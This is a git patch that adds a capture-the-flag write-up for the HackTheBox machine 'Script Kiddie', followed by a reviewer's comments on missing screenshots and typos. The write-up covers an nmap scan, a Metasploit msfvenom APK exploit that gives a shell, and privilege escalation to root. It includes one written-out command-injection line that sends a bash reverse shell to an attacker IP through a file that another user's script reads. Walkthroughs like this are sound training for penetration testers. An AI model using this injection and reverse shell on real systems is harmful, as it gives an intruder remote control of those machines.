From 73083ef646abd0629bf2d6421f5af77a2247cb6b Mon Sep 17 00:00:00 2001
From: ARZ <60057481+AbdullahRizwan101@users.noreply.github.com>
Date: Wed, 3 Mar 2021 02:20:52 +0500
Subject: [PATCH] Add files via upload
---
HackTheBox/Script_Kiddie.md | 106 ++++++++++++++++++++++++++++++++++++
1 file changed, 106 insertions(+)
create mode 100644 HackTheBox/Script_Kiddie.md
diff --git a/HackTheBox/Script_Kiddie.md b/HackTheBox/Script_Kiddie.md
new file mode 100644
index 0000000..0094ec3
--- /dev/null
+++ b/HackTheBox/Script_Kiddie.md
@@ -0,0 +1,106 @@
+# HackTheBox-Script Kiddie
+
+## NMAP
+
+```
+Starting Nmap 7.80 ( https://nmap.org ) at 2021-03-02 19:59 PKT
+Stats: 0:00:17 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
+NSE Timing: About 99.63% done; ETC: 19:59 (0:00:00 remaining)
+Nmap scan report for 10.10.10.226
+Host is up (0.21s latency).
+
+PORT STATE SERVICE VERSION
+22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
+4444/tcp open krb524?
+| fingerprint-strings:
+| GetRequest, NULL:
+| eNrsvWmXIjmSKPo9fwVddXsCiqhgc3AnTmXNEOz7vmbncHwDHHwB31i66/32J/kq34DIqntn7pmbfboCl0wmk8lkMkkm089/S2mKnKI4MXW8qjtJ/MIJR0lWYyCFVGiOs79piWHt35Ji/z
+rypLqRZMH+lkmRkdwvp4TC8iytOl8SfWDdL1XWkDyNOsoSzSpOHcrV+anuZJZkOHHrJ
+5000/tcp open http Werkzeug httpd 0.16.1 (Python 3.8.5)
+|_http-server-header: Werkzeug/0.16.1 Python/3.8.5
+|_http-title: k1d'5 h4ck3r t00l5
+Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
+Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+Nmap done: 1 IP address (1 host up) scanned in 18.45 seconds
+
+```
+
+## PORT 5000 (HTTP)
+
+
+
+Here we can do an nmap scan on the machine but if we try to run bash commands it won't work
+
+
+
+
+
+Similarly with the msfvenom and searchsploit
+
+
+
+Msfvenom successfully generetes payload
+
+
+
+But only windows and android payload generates
+
+
+
+
+Also there weren't any hidden directories or files on the webserver this page was only there on the machine. So on googling a little bit I found that `msfvenom` recently had a vulnerability in the process generating payload
+
+
+
+
+
+This was a latest exploit so metasploit needs to be update if you run to any issues when updating metasploit regarding the gem file do this inorder
+
+`gem update`
+`cd /usr/share/metasploit-framework`
+`sudo nano Gemfile.lock` (update reline version in that file this important before bundle install)
+`sudo bundle install` ( in metasploit folder)
+
+
+
+
+
+
+
+Upload the apk file on the website
+
+
+
+
+
+And you'll get a shell so we will need to stabilize it
+
+
+
+Going to `pwn`'s home directory we see a bash script `scanlosers.sh` which was reading a script file from `kid`'s home directory and execute it
+
+
+
+Seeing that file belongs to `pwn`'s group
+
+
+
+We can edit this with a bash reverse shell , this is the way the payload needs to be crafted.
+
+`echo " ;/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.126/1337 0>&1' #" >> hackers`
+
+
+
+Doing `sudo -l`
+
+
+
+Running metasploit as `sudo`
+
+
+
+We can now run commands as `root`
+
+
+
+
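Review bot: the writeup depends on screenshots that are not part of this upload; the runs of blank `+` lines after steps such as "Here we can do an nmap scan on the machine but if we try to run bash commands it won't work", "Seeing that file belongs to `pwn`'s group" and "Doing `sudo -l`" are where the images presumably sat, so as committed the reader has no evidence for those observations. Either add the image files to the repository with proper markdown image links, or replace each gap with a sentence stating what was observed (for example, the exact `sudo -l` output that shows what `pwn` may run as root). The Gemfile.lock step, "(update reline version in that file this important before bundle install)", should state which reline version was required and the Metasploit version it was tested against, otherwise the fix is not reproducible. The nmap block also carries a fingerprint-strings line that is cut mid-string and wrapped onto a second line (the `eNrsvW…` / `rypLqRZ…` pair); trim it or mark it as truncated, and tag the fence as ```text so it renders consistently. Finally, a few typos to correct before merge: "generetes" to "generates", "inorder" to "in order", "needs to be update" to "needs to be updated", and "if you run to any issues" to "if you run into any issues".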